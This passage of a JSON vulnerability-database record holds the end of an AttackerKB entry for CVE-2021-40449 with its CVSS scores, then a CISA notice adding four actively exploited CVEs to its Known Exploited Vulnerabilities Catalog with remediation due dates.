Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-40449", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40449", "CVE-2021-40450", "CVE-2021-41357"], "modified": "2021-10-20T00:00:00", "id": "AKB:248E5B51-C3A0-4459-AF44-2E0C5544549E", "href": "https://attackerkb.com/topics/1YJ3p8CEZz/cve-2021-40449", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-01-26T11:29:28", "description": "CISA has added four new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), which require remediation from federal civilian executive branch (FCEB) agencies by December 1, 2021. CISA has evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise. \n\n**CVE Number** | **CVE Title** | **Remediation Due Date** \n---|---|--- \n[CVE-2021-22204](<https://nvd.nist.gov/vuln/detail/CVE-2021-22204>) | Exiftool Remote Code Execution vulnerability | 12/01/2021 \n[CVE-2021-40449](<https://nvd.nist.gov/vuln/detail/CVE-2021-40449>) | Microsoft Win32k Elevation of Privilege | 12/01/2021 \n[CVE-2021-42292](<https://nvd.nist.gov/vuln/detail/CVE-2021-42292>) | Microsoft Excel Security Feature Bypass | 12/01/2021 \n[CVE-2021-42321](<https://nvd.nist.gov/vuln/detail/CVE-2021-42321>) | Microsoft Exchange Server Remote Code Execution | 12/01/2021 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >).\n\nThis product is provid